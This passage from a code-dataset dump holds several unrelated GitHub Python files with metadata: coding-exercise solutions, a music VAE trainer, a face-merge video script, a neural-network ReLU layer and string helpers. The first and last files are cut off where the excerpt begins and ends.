failed!')\n\n    def tearDown(self):\n        self.web_driver.close()\n\n\nif __name__ == "__main__":\n    main()\n","repo_name":"maggiewang1117/avocado_test_cockpit","sub_path":"testcases/basic/hostname.py","file_name":"hostname.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16216471918","text":"def first_word(text: str) -> str:\n\n    string = ''\n    \n    \n    for char in text:\n        \n        if char.isupper() or char.isdigit() or char.islower() or char == \"'\": # check for the characters we need\n            string += char\n        \n        elif len(string) > 0: # check for an empty string\n\n            answer = ''\n            gate = True\n\n            for char in string:\n\n                if char.islower() or char.isupper() or char == \"'\": # add the characters the task requires to the answer\n                    answer += char\n\n                else:\n                    answer = ''\n                    string = ''\n                    gate = False # if nothing was added, close the gate\n                    break # and break out of the loop\n\n            if gate:\n                return answer\n\n    return text\n    \nif __name__ == '__main__':\n    print(\"Example:\")\n    print(first_word(\"Hello world\"))\n    \n    # These \"asserts\" are used for self-checking and not for an auto-testing\n    assert first_word(\"Hello world\") == \"Hello\"\n    assert first_word(\" a word \") == \"a\"\n    assert first_word(\"don't touch it\") == \"don't\"\n    assert first_word(\"greetings, friends\") == \"greetings\"\n    assert first_word(\"... and so on ...\") == \"and\"\n    assert first_word(\"hi\") == \"hi\"\n    assert first_word(\"Hello.World\") == \"Hello\"\n    print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n    ","repo_name":"PontificSalivan/Checkio","sub_path":"Home tasks/first_word.py","file_name":"first_word.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699622658","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n        \n        pseudoHead = ListNode()\n        head = pseudoHead\n        \n        t1, t2 = l1, l2\n        carry = 0\n        while t1 and t2:\n            q, r = divmod(t1.val + t2.val + carry, 10)\n            head.next = ListNode(r)\n            head = head.next\n            t1, t2 = t1.next, t2.next\n            carry = q\n        \n        t1 = t1 if t1 else t2\n        \n        while t1:\n            q, r = divmod(t1.val + carry, 10)\n            head.next = ListNode(r)\n            head = head.next\n            t1 = t1.next\n            carry = q\n        \n        if carry:\n            head.next = ListNode(carry)\n        \n        return pseudoHead.next","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8515830532","text":"cents = int(input('Money in Cents: '))\r\ntoonies = 0\r\nloonies = 0\r\nquarters = 0\r\ndimes = 0\r\nnickels = 0\r\npennies = 0\r\nwhile cents != 0:\r\n    if cents >= 200:\r\n        cents -= 200\r\n        toonies += 1\r\n    elif cents >= 100:\r\n        cents -= 100\r\n        loonies += 1\r\n    elif cents >= 25:\r\n        cents -= 25\r\n        quarters += 1\r\n    elif cents >= 10:\r\n        cents -= 10\r\n        dimes += 1\r\n    elif cents >= 5:\r\n        cents -= 5\r\n        nickels += 1\r\n    elif cents >= 1:\r\n        cents -= 1\r\n        pennies += 1\r\n\r\nprint(f'Toonies: {toonies}')\r\nprint(f'Loonies: {loonies}')\r\nprint(f'Quarters: {quarters}')\r\nprint(f'Dimes: {dimes}')\r\nprint(f'Nickels: {nickels}')\r\nprint(f'Pennies: 
{pennies}')","repo_name":"nicholaspoon03/wave_1","sub_path":"making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71414623132","text":"import os\nimport json\nimport torch\nfrom tqdm import tqdm\nimport music21\nfrom typing import Tuple\nimport pandas as pd\n\nfrom helpers import concatenate_scores\nfrom src.utils.trainer import Trainer\nfrom src.dmelodiesvae.dmelodies_vae import DMelodiesVAE\nfrom src.utils.helpers import to_cuda_variable_long, to_cuda_variable, to_numpy\nfrom src.utils.evaluation import *\nfrom src.utils.plotting import *\n\n\nLATENT_ATTRIBUTES = {\n 'tonic': 0,\n 'octave': 1,\n 'mode': 2,\n 'rhythm_bar1': 3,\n 'rhythm_bar2': 4,\n 'arp_chord1': 5,\n 'arp_chord2': 6,\n 'arp_chord3': 7,\n 'arp_chord4': 8\n}\n\nLATENT_NORMALIZATION_FACTORS = torch.tensor(\n [11, 2, 2, 27, 27, 1, 1, 1, 1],\n dtype=torch.float32\n)\n\n\nclass DMelodiesVAETrainer(Trainer):\n def __init__(\n self,\n dataset,\n model: DMelodiesVAE,\n model_type='beta-VAE',\n lr=1e-4,\n beta=0.001,\n gamma=1.0,\n delta=10.0,\n capacity=0.0,\n device=0,\n rand=0,\n ):\n super(DMelodiesVAETrainer, self).__init__(dataset, model, lr)\n self.model_type = model_type\n self.attr_dict = LATENT_ATTRIBUTES\n self.attr_norm_factors = LATENT_NORMALIZATION_FACTORS\n self.reverse_attr_dict = {\n v: k for k, v in self.attr_dict.items()\n }\n self.metrics = {}\n self.beta = beta\n self.capacity = capacity\n # self.capacity = to_cuda_variable(torch.FloatTensor([capacity]))\n self.cur_epoch_num = 0\n self.warm_up_epochs = 10\n self.num_iterations = 100000\n if self.model_type == 'beta-VAE':\n self.exp_rate = np.log(1 + self.beta) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = self.capacity\n self.cur_capacity = self.capacity\n elif self.model_type == 'annealed-VAE':\n self.exp_rate = np.log(1 + self.capacity) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = 0.0\n self.cur_capacity = self.start_capacity\n elif self.model_type == 'ar-VAE':\n self.exp_rate = np.log(1 + self.beta) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = self.capacity\n self.cur_capacity = self.capacity\n self.gamma = gamma\n self.delta = delta\n self.anneal_iterations = 0\n self.device = device\n self.rand_seed = rand\n torch.manual_seed(self.rand_seed)\n np.random.seed(self.rand_seed)\n self.trainer_config = f'_{self.model_type}_b_{self.beta}_c_{self.capacity}_'\n if model_type == 'ar-VAE':\n self.trainer_config += f'g_{self.gamma}_d_{self.delta}_'\n self.trainer_config += f'r_{self.rand_seed}_'\n self.model.update_trainer_config(self.trainer_config)\n\n def update_scheduler(self, epoch_num):\n \"\"\"\n Updates the training scheduler if any\n :param epoch_num: int,\n \"\"\"\n if epoch_num > self.warm_up_epochs:\n if self.anneal_iterations < self.num_iterations:\n if self.model_type == 'beta-VAE':\n self.cur_beta = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n elif self.model_type == 'annealed-VAE':\n self.cur_beta = self.beta\n self.cur_capacity = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n elif self.model_type == 'ar-VAE':\n self.cur_beta = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n self.anneal_iterations += 1\n\n def process_batch_data(self, batch):\n \"\"\"\n Processes the batch returned by the dataloader 
iterator\n :param batch: object returned by the dataloader iterator\n :return: tuple of Torch Variable objects\n \"\"\"\n score_tensor, latent_tensor = batch\n # convert input to torch Variables\n batch_data = (\n to_cuda_variable_long(score_tensor.squeeze(1), self.device),\n to_cuda_variable_long(latent_tensor.squeeze(1), self.device)\n )\n return batch_data\n\n def loss_and_acc_for_batch(self, batch, epoch_num=None, batch_num=None, train=True):\n \"\"\"\n Computes the loss and accuracy for the batch\n Must return (loss, accuracy) as a tuple, accuracy can be None\n :param batch: torch Variable,\n :param epoch_num: int, used to change training schedule\n :param batch_num: int\n :param train: bool, True is backward pass is to be performed\n :return: scalar loss value, scalar accuracy value\n \"\"\"\n if self.cur_epoch_num != epoch_num:\n flag = True\n self.cur_epoch_num = epoch_num\n else:\n flag = False\n\n # extract data\n score, latent_attributes = batch\n\n # perform forward pass of src\n weights, samples, z_dist, prior_dist, z_tilde, z_prior = self.model(\n measure_score_tensor=score,\n measure_metadata_tensor=None,\n train=train\n )\n\n # compute reconstruction loss\n recons_loss = self.reconstruction_loss(x=score, x_recons=weights)\n\n # compute KLD loss\n if self.model_type == 'beta-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=0.0)\n dist_loss = torch.nn.functional.relu(dist_loss - self.cur_capacity)\n elif self.model_type == 'annealed-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=self.cur_capacity)\n elif self.model_type == 'ar-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=0.0)\n dist_loss = torch.nn.functional.relu(dist_loss - self.cur_capacity)\n else:\n raise ValueError('Invalid Model Type')\n\n # add loses\n loss = recons_loss + dist_loss\n\n # add regularization loss for ar-VAE\n reg_loss = 0.0\n if self.model_type == 'ar-VAE':\n # process latent attributes\n metadata = self.normalize_latent_attributes(latent_attributes)\n # compute regularization loss\n for attr in self.attr_dict.keys():\n dim = self.attr_dict[attr]\n labels = metadata[:, dim]\n reg_loss += self.compute_reg_loss(\n z_tilde, labels, dim, gamma=self.gamma, factor=self.delta\n )\n # add regularization loss\n loss += reg_loss\n\n # log values\n if flag:\n self.writer.add_scalar(\n 'loss_split/recons_loss', recons_loss.item(), epoch_num\n )\n self.writer.add_scalar(\n 'loss_split/dist_loss', dist_loss.item(), epoch_num\n )\n if self.model_type == 'ar-VAE':\n self.writer.add_scalar(\n 'loss_split/reg_loss', (reg_loss / self.gamma).item(), epoch_num\n )\n self.writer.add_scalar(\n 'params/beta', self.cur_beta, epoch_num\n )\n self.writer.add_scalar(\n 'params/capacity', self.cur_capacity, epoch_num\n )\n\n # compute accuracy\n accuracy = self.mean_accuracy(\n weights=weights, targets=score\n )\n\n return loss, accuracy\n\n def normalize_latent_attributes(self, latent_attributes):\n metadata = latent_attributes.clone().float()\n metadata = torch.div(metadata, to_cuda_variable(self.attr_norm_factors))\n return metadata\n\n def compute_representations(self, data_loader, num_batches=None, return_input=False):\n latent_codes = []\n attributes = []\n if return_input:\n input_data = []\n if num_batches is None:\n num_batches = 200\n for batch_id, batch in tqdm(enumerate(data_loader)):\n inputs, latent_attributes = self.process_batch_data(batch)\n _, _, _, _, z_tilde, _ = self.model(inputs, None, train=False)\n 
latent_codes.append(to_numpy(z_tilde.cpu()))\n attributes.append(to_numpy(latent_attributes))\n if return_input:\n input_data.append(to_numpy(inputs))\n if batch_id == num_batches:\n break\n latent_codes = np.concatenate(latent_codes, 0)\n attributes = np.concatenate(attributes, 0)\n attr_list = [\n attr for attr in self.attr_dict.keys()\n ]\n if return_input:\n input_data = np.concatenate(input_data, 0)\n return latent_codes, attributes, attr_list, input_data\n return latent_codes, attributes, attr_list\n\n def eval_model(self, data_loader, epoch_num=0):\n if self.writer is not None:\n # evaluation takes time due to computation of metrics\n # so we skip it during training epochs\n metrics = None\n else:\n metrics = self.compute_eval_metrics()\n return metrics\n\n def compute_eval_metrics(self):\n \"\"\"Returns the saved results as dict or computes them\"\"\"\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n if os.path.exists(results_fp):\n with open(results_fp, 'r') as infile:\n self.metrics = json.load(infile)\n return self.metrics\n batch_size = 512\n _, _, gen_test = self.dataset.data_loaders(batch_size=batch_size, split=(0.70, 0.20))\n latent_codes, attributes, attr_list = self.compute_representations(gen_test)\n self.metrics.update(compute_mig(latent_codes, attributes))\n mig_factors = self.metrics[\"mig_factors\"]\n self.metrics[\"mig_factors\"] = {attr: mig for attr, mig in zip(attr_list, mig_factors)}\n self.metrics.update(compute_modularity(latent_codes, attributes))\n self.metrics.update(compute_sap_score(latent_codes, attributes))\n self.metrics.update(self.test_model(batch_size=batch_size))\n with open(results_fp, 'w') as outfile:\n json.dump(self.metrics, outfile, indent=2)\n return self.metrics\n\n def test_model(self, batch_size):\n _, _, gen_test = self.dataset.data_loaders(batch_size)\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )\n return {\n \"test_loss\": mean_loss_test,\n \"test_acc\": mean_accuracy_test,\n }\n\n def loss_and_acc_test(self, data_loader):\n mean_loss = 0\n mean_accuracy = 0\n\n for sample_id, batch in tqdm(enumerate(data_loader)):\n inputs, _ = self.process_batch_data(batch)\n # compute forward pass\n outputs, _, _, _, _, _ = self.model(\n measure_score_tensor=inputs,\n measure_metadata_tensor=None,\n train=False\n )\n # compute loss\n recons_loss = self.reconstruction_loss(\n x=inputs, x_recons=outputs\n )\n loss = recons_loss\n # compute mean loss and accuracy\n mean_loss += to_numpy(loss.mean())\n accuracy = self.mean_accuracy(\n weights=outputs,\n targets=inputs\n )\n mean_accuracy += to_numpy(accuracy)\n mean_loss /= len(data_loader)\n mean_accuracy /= len(data_loader)\n return (\n mean_loss,\n mean_accuracy\n )\n\n def plot_data_dist(self, latent_codes, attributes, attr_str, dim1=0, dim2=1):\n save_filename = os.path.join(\n Trainer.get_save_dir(self.model),\n 'data_dist_' + attr_str + '.png'\n )\n img = plot_dim(\n latent_codes, attributes[:, self.attr_dict[attr_str]], save_filename, dim1=dim1, dim2=dim2,\n )\n return img\n\n def compute_latent_hole_metric(self, ):\n pass\n\n def plot_latent_surface(self, z, attr_str, dim1=0, dim2=1, dim1_low=-5.0, dim1_high=5.0):\n \"\"\"\n Plots the value of an attribute over a surface defined by the dimensions\n :param z: input latent code\n :param dim1: int,\n :param dim2: int,\n :param grid_res: float,\n 
:return:\n \"\"\"\n # create the dataspace\n x1 = torch.linspace(dim1_low, dim1_high, steps=200)\n x2 = torch.linspace(-3., 3., steps=200)\n z1, z2 = torch.meshgrid([x1, x2])\n num_points = z1.size(0) * z1.size(1)\n # z = torch.randn(1, self.model.latent_space_dim)\n z = z.repeat(num_points, 1)\n z[:, dim1] = z1.contiguous().view(1, -1)\n z[:, dim2] = z2.contiguous().view(1, -1)\n z = to_cuda_variable(z)\n\n mini_batch_size = 500\n num_mini_batches = num_points // mini_batch_size\n attr_labels_all = []\n for i in tqdm(range(num_mini_batches)):\n z_batch = z[i * mini_batch_size:(i+1) * mini_batch_size, :]\n _, samples = self.decode_latent_codes(z_batch)\n # dummy_score_tensor = to_cuda_variable(\n # torch.zeros(z_batch.size(0), 16)\n # )\n # _, samples = self.model.decoder(\n # z=z_batch,\n # score_tensor=dummy_score_tensor,\n # train=False\n # )\n samples = samples.view(z_batch.size(0), -1)\n labels = self.compute_attribute_labels(samples)\n attr_labels_all.append(labels)\n\n attr_labels_all = np.concatenate(attr_labels_all, 0)\n z = to_numpy(z)[:num_mini_batches*mini_batch_size, :]\n # remove points with undefined attributes\n plot_attr = attr_labels_all[:, self.attr_dict[attr_str]]\n a = z[~(plot_attr == -1), :]\n b = plot_attr[~(plot_attr == -1)]\n # save_filename = os.path.join(\n # Trainer.get_save_dir(self.model),\n # f'data_surface_{attr_str}.png'\n # )\n return a, b\n # plot_dim(a, b, save_filename, dim1=dim1, dim2=dim2)\n\n def plot_latent_interpolations(self):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n reg_lim_dict = None\n if \"reg_dim_limits\" in metrics.keys():\n reg_lim_dict = metrics[\"reg_dim_limits\"]\n _, _, gen_test = self.dataset.data_loaders(batch_size=256)\n latent_codes, attributes, attr_list, input_data = self.compute_representations(\n gen_test, num_batches=1, return_input=True\n )\n\n # n = min(num_points, latent_codes.shape[0])\n # interp_dict = self.compute_eval_metrics()[\"mig_factors\"]\n n = 121\n lc = latent_codes[n:n+1, :]\n orig_data = input_data[n, :]\n # attr_labels = self.compute_attribute_labels(torch.from_numpy(orig_data).unsqueeze(0))\n # save original\n orig_score = self.dataset.tensor_to_m21score(torch.from_numpy(orig_data))\n orig_save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'orig_{n}.mid'\n )\n orig_score.write('midi', fp=orig_save_filepath)\n # compute reconstruction as music21 score\n recons_score, _ = self.decode_latent_codes(torch.from_numpy(lc))\n recons_save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'recons_{n}.mid'\n )\n recons_score.write('midi', fp=recons_save_filepath)\n # compute interpolations\n for i, attr_str in enumerate(attr_list):\n dim = self.attr_dict[attr_str]\n if reg_lim_dict is not None:\n max_lim = reg_lim_dict[attr_str][0]\n min_lim = reg_lim_dict[attr_str][1]\n else:\n max_lim = 4.0\n min_lim = -4.0\n score, tensor_score = self.compute_latent_interpolations(\n lc, orig_score, dim, num_points=5, max_lim=max_lim, min_lim=min_lim\n )\n # compute attributes for interpolations\n attr_labels = self.compute_attribute_labels(tensor_score.cpu())\n # write MIDI file\n save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'latent_interpolations_{attr_str}_{n}.mid'\n )\n score.write('midi', fp=save_filepath)\n # plot MIDI\n plot_pianoroll_from_midi(save_filepath, attr_labels[:, i], attr_str)\n # plot_score_from_midi(save_filepath, attr_labels[:, i], 
attr_str)\n\n def decode_latent_codes(self, latent_codes):\n batch_size = latent_codes.size(0)\n dummy_score_tensor = to_cuda_variable(\n torch.zeros(batch_size, 16)\n )\n _, tensor_score = self.model.decoder(latent_codes, dummy_score_tensor, False)\n score = self.dataset.tensor_to_m21score(tensor_score)\n return score, tensor_score\n\n def compute_latent_interpolations(self, latent_code, original_score, dim1=0, num_points=6, max_lim=4.0, min_lim=-4.0):\n # assert num_points % 2 == 0\n x1 = torch.linspace(min_lim, max_lim, num_points)\n num_points = x1.size(0)\n z = to_cuda_variable(torch.from_numpy(latent_code))\n z = z.repeat(num_points, 1)\n z[:, dim1] = x1.contiguous()\n num_measures = z.size(0)\n score_list = []\n tensor_score_list = []\n for n in range(num_measures):\n score, tensor_score = self.decode_latent_codes(z[n:n+1, :])\n score_list.append(score)\n tensor_score_list.append(tensor_score)\n # score_list[num_points // 2] = original_score\n concatenated_score = concatenate_scores(score_list)\n concatenated_tensor_score = torch.cat(tensor_score_list)\n concatenated_tensor_score = torch.squeeze(concatenated_tensor_score, dim=1)\n return concatenated_score, concatenated_tensor_score\n\n def compute_attribute_labels(self, tensor_score):\n \"\"\"\n Computes the attribute values for a score generated by the decoder\n Args:\n tensor_score: pytorch Tensor, N x 16, N is the batch size\n \"\"\"\n attr_labels = np.zeros((tensor_score.shape[0], len(self.attr_dict.keys())))\n for i in range(tensor_score.shape[0]):\n attr_labels[i, :] = np.array(self.dataset.compute_attributes(tensor_score[i, :]))\n return attr_labels.astype('int')\n\n def update_non_reg_dim_limits(self, overwrite=False):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"non_reg_dim_limits\" in metrics.keys() and not overwrite:\n non_reg_lim_dict = np.array(metrics[\"non_reg_dim_limits\"])\n else:\n _, gen_val, _ = self.dataset.data_loaders(batch_size=512)\n latent_codes, attributes, attr_list = self.compute_representations(gen_val)\n non_reg_lim_dict = {}\n attr_dims = [d for d in self.attr_dict.values()]\n latent_dims = list(np.arange(0, self.model.latent_space_dim))\n non_reg_dims = list(set(latent_dims) - set(attr_dims))\n for i in non_reg_dims:\n non_reg_lim_dict[str(i)] = (np.max(latent_codes[:, i]).item(), np.min(latent_codes[:, i]).item())\n metrics[\"non_reg_dim_limits\"] = non_reg_lim_dict\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n return non_reg_lim_dict\n\n def update_reg_dim_limits(self, overwrite=False):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"reg_dim_limits\" in metrics.keys() and not overwrite:\n reg_lim_dict = np.array(metrics[\"reg_dim_limits\"])\n else:\n _, gen_val, _ = self.dataset.data_loaders(batch_size=512)\n latent_codes, attributes, attr_list = self.compute_representations(gen_val)\n reg_lim_dict = {}\n for i, attr in enumerate(attr_list):\n reg_lim_dict[attr] = (np.max(latent_codes[:, i]).item(), np.min(latent_codes[:, i]).item())\n metrics[\"reg_dim_limits\"] = reg_lim_dict\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n return reg_lim_dict\n\n def evaluate_latent_interpolations(self, overwrite=False, plot=False):\n results_fp = os.path.join(\n 
os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"eval_interpolations\" in metrics.keys() and not overwrite:\n attr_change_mat = np.array(metrics[\"eval_interpolations\"])\n else:\n reg_lim_dict = metrics[\"reg_dim_limits\"]\n _, _, gen_test = self.dataset.data_loaders(batch_size=256)\n latent_codes, attributes, attr_list, input_data = self.compute_representations(\n gen_test, num_batches=4-1, return_input=True\n )\n num_datapoints = latent_codes.shape[0]\n eval_mat = np.zeros((\n len(self.attr_dict.keys()),\n num_datapoints,\n len(self.attr_dict.keys())\n ))\n for n in tqdm(range(num_datapoints)):\n lc = latent_codes[n:n + 1, :]\n orig_data = input_data[n, :]\n orig_score = self.dataset.tensor_to_m21score(torch.from_numpy(orig_data))\n orig_attr_labels = self.compute_attribute_labels(torch.from_numpy(orig_data).unsqueeze(0))\n\n # compute interpolations\n for i, attr_str in enumerate(attr_list):\n dim = self.attr_dict[attr_str]\n lims = reg_lim_dict[attr_str]\n score, tensor_score = self.compute_latent_interpolations(\n lc,\n orig_score,\n dim,\n num_points=5,\n max_lim=lims[0],\n min_lim=lims[1]\n )\n # compute attributes for interpolations\n attr_labels = self.compute_attribute_labels(tensor_score.cpu())\n diff_array = attr_labels - orig_attr_labels\n diff_array[diff_array != 0] = 1\n attr_change = np.sum(diff_array, axis=0)\n eval_mat[i, n, :] = attr_change\n attr_change_mat = np.sum(eval_mat, axis=1) / eval_mat.shape[1]\n\n metrics[\"eval_interpolations\"] = attr_change_mat.tolist()\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n\n # # save as heatmap\n # if plot:\n # index = [i for i, _ in enumerate(self.attr_dict.keys())]\n # columns = [k for _, k in enumerate(self.attr_dict.keys())]\n # attr_change_mat = attr_change_mat / 6\n # np.fill_diagonal(attr_change_mat, 1.0)\n # data = pd.DataFrame(\n # data=attr_change_mat,\n # index=index,\n # columns=columns,\n # )\n # save_filepath = os.path.join(\n # Trainer.get_save_dir(self.model),\n # f'eval_interpolations_norm.pdf'\n # )\n # create_heatmap(data, xlabel='Factor of Variation', ylabel='Regularized Dimension', save_path=save_filepath)\n\n return attr_change_mat\n\n @staticmethod\n def reconstruction_loss(x, x_recons):\n return Trainer.mean_crossentropy_loss(weights=x_recons, targets=x)\n\n @staticmethod\n def compute_reg_loss(z, labels, reg_dim, gamma, factor=1.0):\n \"\"\"\n Computes the regularization loss\n \"\"\"\n x = z[:, reg_dim]\n reg_loss = Trainer.reg_loss_sign(x, labels, factor=factor)\n return gamma * reg_loss\n","repo_name":"ashispati/dmelodies_controllability","sub_path":"src/dmelodiesvae/dmelodies_vae_trainer.py","file_name":"dmelodies_vae_trainer.py","file_ext":"py","file_size_in_byte":24523,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"10012067708","text":"__author__ = 'alfie'\n\nimport string\n\nclass CommonFunctions():\n def makeLowercaseFirstChar(self, s):\n if len(s) == 0:\n return s\n else:\n return s[0].lower() + s[1:]\n\n def makeUppercaseFirstCharInStringArray(self, s):\n myStr = \"\"\n for i in s.split(' '):\n if len(i) == 0:\n myStr = myStr + i\n else:\n myStr = myStr + i[0].upper() + i[1:]\n return myStr\n\n def makeAttributeName(self, tag):\n table = ''.maketrans('', '')\n stripTag = tag.translate(dict.fromkeys(' ', table))\n if (len(stripTag.split(' ',1)) > 1):\n return self.makeLowercaseFirstChar(stripTag.split(' 
',1)[0]) + self.makeUppercaseFirstCharInStringArray(stripTag.split(' ',1)[1])\n        else:\n            return self.makeLowercaseFirstChar(stripTag.split(' ',1)[0])","repo_name":"phnmnl/isa-api","sub_path":"isatools/convert/common_functions.py","file_name":"common_functions.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
{"seq_id":"33950746245","text":"#== LIST MANIPULATION ==#\r\n#(UNICAMP)\r\n#2) Given two lists P1 and P2, each with n real values representing a class's grades\r\n# on test 1 and test 2, respectively, write a program that \r\n# computes the class average on tests 1 and 2, printing on which test the class got the \r\n# better average. \r\n# Example: \r\n# Class size: 5 \r\n# P1: 7.0 8.3 10.0 6.5 9.3 \r\n# P2: 8.5 6.9 5.0 7.5 9.8 \r\n# Answer: \r\n# Class average on test 1: 8.22 \r\n# Class average on test 2: 7.54 \r\n# The class got the better average on test 1.\r\n\r\nqprovas = int(input('Enter the number of tests: '))\r\nqalunos = int(input('Enter the number of students in the class: '))\r\n\r\nprovas_turma = []\r\nfor provas in range(qprovas):\r\n    notas_alunos = []\r\n    for notas in range(qalunos):\r\n        notas_alunos.append(float(input('Test ' + str(provas+1) + ' student ' + str(notas+1) + ': ')))\r\n    provas_turma.append(notas_alunos)\r\nprint(provas_turma)\r\n\r\n#SUM OF THE GRADES\r\nnotas_soma = [sum(x) for x in provas_turma]\r\nprint(notas_soma)\r\n\r\n#AVERAGE OF THE GRADES\r\nmedia_notas = []\r\np = []\r\nfor j in range(qprovas):\r\n    p.append(j+1)\r\n    for i in notas_soma:\r\n        m = i/qalunos\r\n        media_notas.append(m)\r\n    print('Class average on test ' + str(j+1) + ': ',round(media_notas[j],2))\r\n\r\n#HIGHEST VALUE\r\nmais = p[0]\r\nfor (p1,m1) in zip(p[1:],media_notas[1:]):\r\n    if m1 > media_notas[p.index(mais)]:\r\n        mais = p1\r\nprint('The class got the better average on test %s' %mais)","repo_name":"MatematicacomWillP/python_basico","sub_path":"Aula_05_2.py","file_name":"Aula_05_2.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"34670918325","text":"import cv2\n\nimport cv2\nimport os\nfrom PIL import Image\nimport face_recognition\nimport core\n\n\ndef getFaceAres(img=\"\"):\n    image1 = face_recognition.load_image_file(img)\n    arr=list(face_recognition.face_locations(image1)[0])\n    print(\"arr\",arr)\n    area=[]\n    area.append(arr[-1])\n    area.append(arr[0])\n    area.append(arr[1]-arr[-1])\n\n    area.append(arr[2]-arr[0])\n    print(\"area\",area)\n    return area\n\n\ndef PicToVideo(imgPath, videoPath,model=\"\",l=1000):\n    images = os.listdir(imgPath)\n    images.sort()\n    print(images)\n    fps = 25  # frame rate\n    fourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n    im = Image.open(imgPath +\"1.png\")\n    videoWriter = cv2.VideoWriter(videoPath, fourcc, fps, im.size)\n    for im_name in range(1,l):\n        faca_area = getFaceAres(imgPath +str(im_name)+\".png\")\n        print(images[im_name])\n        core.face_merge(src_img=imgPath +str(im_name)+\".png\",\n                        dst_img=model,\n                        out_img=\"out\"+str(im_name)+\".png\",\n                        face_area=faca_area,\n                        alpha=0.85,\n                        k_size=(15, 10),\n                        mat_multiple=0.85)\n        frame = cv2.imread(imgPath + \"out\"+str(im_name)+\".png\")\n        videoWriter.write(frame)\n        print(im_name)\n    videoWriter.release()\n\n\n# imgPath = \"img1/\"\n# videoPath = \"video2.mp4\"\n# PicToVideo(imgPath, videoPath)\n\n\ndef videoToImg(name=\"\"):\n    vc=cv2.VideoCapture(name)\n    c = 0\n    rval = vc.isOpened()\n\n    while rval:\n        c = c + 1\n        
rval, frame = vc.read()\n print(c)\n if rval:\n cv2.imwrite(\"img1/\"+ str(c) + '.png', frame)\n cv2.waitKey(1)\n else:\n break\n vc.release()\n# videoToImg(\"IMG_3566.MOV\")\nif __name__ == '__main__':\n # videoToImg(\"IMG_3567.MOV\")\n imgPath = \"img1/\"\n videoPath = \"outVideo.mp4\"\n PicToVideo(imgPath, videoPath,\"model.jpg\")\n\n","repo_name":"daxuliu/myface-fusion","sub_path":"video/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74077796891","text":"from NeuralLayer import NeuralLayer\nimport numpy as np\n\nimport numpy as np\nclass ReluLayer(NeuralLayer):\n \"\"\"\n All the negative values given to this layer become cero.\n \"\"\"\n def forwardPropagation(self,input):\n # Revisar caso en que la imagen es de un canal (blanco y negro)\n input_heigth, input_width,channels = input.shape\n self.outputFeatureMap = input.clip(min=0)\n self.deltas = []\n for channel in range(channels):\n self.deltas.append(np.zeros((input_heigth,input_width)))\n self.nextLayer.forwardPropagation(self.outputFeatureMap)\n\n def backPropagation(self):\n self.previousLayer.deltas = self.deltas\n if np.array_equal(self.deltas[0], np.zeros(shape=self.deltas[0].shape)):\n print(\"asdf\")\n self.previousLayer.backPropagation()\n\n","repo_name":"belisariops/ConvNetwork","sub_path":"ReluLayer.py","file_name":"ReluLayer.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20540910717","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.contrib.loader.processor import TakeFirst\nfrom urlparse import 